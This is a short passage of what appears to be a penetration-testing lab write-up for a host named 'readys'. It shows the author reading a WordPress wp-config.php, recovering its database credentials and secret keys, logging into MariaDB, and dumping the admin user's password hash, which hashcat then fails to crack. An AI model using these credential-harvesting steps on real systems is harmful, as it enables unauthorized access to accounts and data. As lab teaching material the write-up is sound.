MySQL
Checking for DB credentials after performing a manual system enumeration
redis@readys:/var/www/html$ head -n 60 wp-config.php | grep -v '^[#/*]'
<?php
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'karl' );
define( 'DB_PASSWORD', 'Wordpress1234' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'U&5t_g6qETo;aW<*v0?ZhvVe)AA*YK1htIP[MQ|;4b:(3zn4mr}ZhB=}COD%Dj.v' );
define( 'SECURE_AUTH_KEY', 'CkTq*B;w+Y5W;x8(8>LbY_t/K87zY=VZF9xzj@ n,_.!J=J?//-n/,j0}_}6yjN5' );
define( 'LOGGED_IN_KEY', 'V*hjSgk5{ FIjoe!d[2{U!4dn?%(5q 5v!%KYQ-qY[U7x+C@zJ$h^6ZsOt<qLnoY' );
define( 'NONCE_KEY', '3[W^SusVixH:eLWy&Gpgg_eV`uW?_f_zWZ].X^t6;vSL#i~/seZjo)T?[-PjgvpR' );
define( 'AUTH_SALT', '2{pjQXVVH5j|w^qs8ebjHd}-B~{EDixVAT1,2BS}W~{x!*eCF6>wU:y<6zKci^qM' );
define( 'SECURE_AUTH_SALT', '8geS0)8+9m@xeRzw:L#+f{9{5w;)?LQlw)]$j:>Fo7=Z9Sr5ooZ^TH[7s5zD{Tm1' );
define( 'LOGGED_IN_SALT', 'xD@a0!V[#V(o]5?8R]~JTgmjr)ck6C#LNhx|#OgR4|):-32EP6OW2FVR:4BM.At~' );
define( 'NONCE_SALT', '||qT!4-3-OSwQiO@.OfrFhkEZnI_8fyi$ne6#!m_3uUd=-GEZ^mA<-2_%3=Eje+a' );DB credential found in thewp-config.php file; karl:Wordpress1234
This was discovered by PEAS as well
redis@readys:~$ mysql -ukarl -pWordpress1234
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 36
Server version: 10.3.31-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changedSession established
MariaDB [wordpress]> SELECT user_login,user_pass FROM wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| admin | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 |
+------------+------------------------------------+
1 row in set (0.000 sec)Exfiltrating the credential hash of the admin user; $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0
hashcat was unable to crack the password hash